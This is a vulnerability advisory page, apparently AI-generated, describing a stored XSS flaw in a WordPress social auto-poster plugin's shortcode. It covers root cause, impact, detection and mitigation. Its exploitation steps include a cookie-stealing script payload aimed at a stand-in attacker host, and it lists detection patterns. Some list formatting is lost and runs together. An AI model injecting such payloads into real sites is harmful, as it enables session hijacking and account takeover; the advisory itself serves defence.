
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-3228 is a Stored Cross-Site Scripting (XSS) vulnerability in the NextScripts: Social Networks Auto-Poster plugin for WordPress, affecting all versions up to and including 4.4.6. The flaw allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts via the [nxs_fbembed] shortcode, which are then executed in the browsers of any user who visits the affected page. It was published on March 10, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is insufficient input sanitization and output escaping on the snapFB post meta value processed by the [nxs_fbembed] shortcode, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An authenticated attacker with at minimum Contributor-level WordPress access can set a malicious value in the snapFB post meta field; when the shortcode renders on a page, the unsanitized value is written directly into the HTML output without escaping, enabling script injection. The vulnerable code path is located in inc-cl/fb.php at line 581 of the plugin (Wordfence, WordPress Trac). A public Python-based PoC exploit automating the full attack chain is available on GitHub (PoC GitHub).
Successful exploitation allows injected scripts to execute in the browsers of all users — including administrators — who visit the compromised page, impacting both confidentiality (e.g., session cookie theft) and integrity (e.g., unauthorized content modification or admin account creation). Because the payload is stored server-side, every page view triggers execution without further attacker interaction, maximizing the blast radius. The scope is changed (S:C in CVSS), meaning the impact extends beyond the plugin itself to the broader WordPress site and its visitors (Wordfence, Red Hat CVE).
A fully functional Python PoC exploit was published on GitHub on March 11, 2026, automating authentication, payload injection, session cookie theft, and attempted admin account creation (PoC GitHub). The EPSS score is approximately 0.03%, indicating low but non-zero probability of exploitation in the wild, and there is no current evidence of active in-the-wild exploitation or CISA KEV catalog listing (Red Hat CVE). Exploitation requires only Contributor-level WordPress credentials, which lowers the barrier significantly on sites with open or loosely managed contributor registration.
/wp-content/plugins/social-networks-auto-poster-facebook-twitter-g/readme.txt.[nxs_fbembed] shortcode.snapFB post meta value to a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) via the post editor's custom fields or directly via the WordPress REST API/admin interface.[nxs_fbembed], the injected script executes in their browser, enabling cookie theft, session hijacking, or admin account creation.wp-admin/post.php or the REST API (/wp-json/wp/v2/posts) from Contributor-level accounts containing script tags or encoded JavaScript in the snapFB meta field.wp_postmeta table) where meta_key = 'snapFB' contains <script>, javascript:, or encoded variants.[nxs_fbembed] shortcode, potentially carrying cookie or session data in query parameters.[nxs_fbembed] shortcode reported by site visitors or administrators (PoC GitHub).Update the NextScripts: Social Networks Auto-Poster plugin to a version newer than 4.4.6, which includes the fix applied in the changeset to inc-cl/fb.php (WordPress Trac Changeset). If an immediate update is not possible, restrict Contributor-level and above access to only fully trusted users, and consider disabling the [nxs_fbembed] shortcode functionality. Deploying a Web Application Firewall (WAF) with rules to detect and block script injection in post meta fields provides an additional layer of defense (Wordfence).
Wordfence included CVE-2026-3228 in their weekly WordPress vulnerability report for March 9–15, 2026, highlighting it as part of a broader set of plugin vulnerabilities tracked that week (Wordfence Blog). Check Point also published a defense advisory referencing the vulnerability (Check Point Advisory). Community reaction has been moderate, consistent with a medium-severity plugin vulnerability requiring authenticated access.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."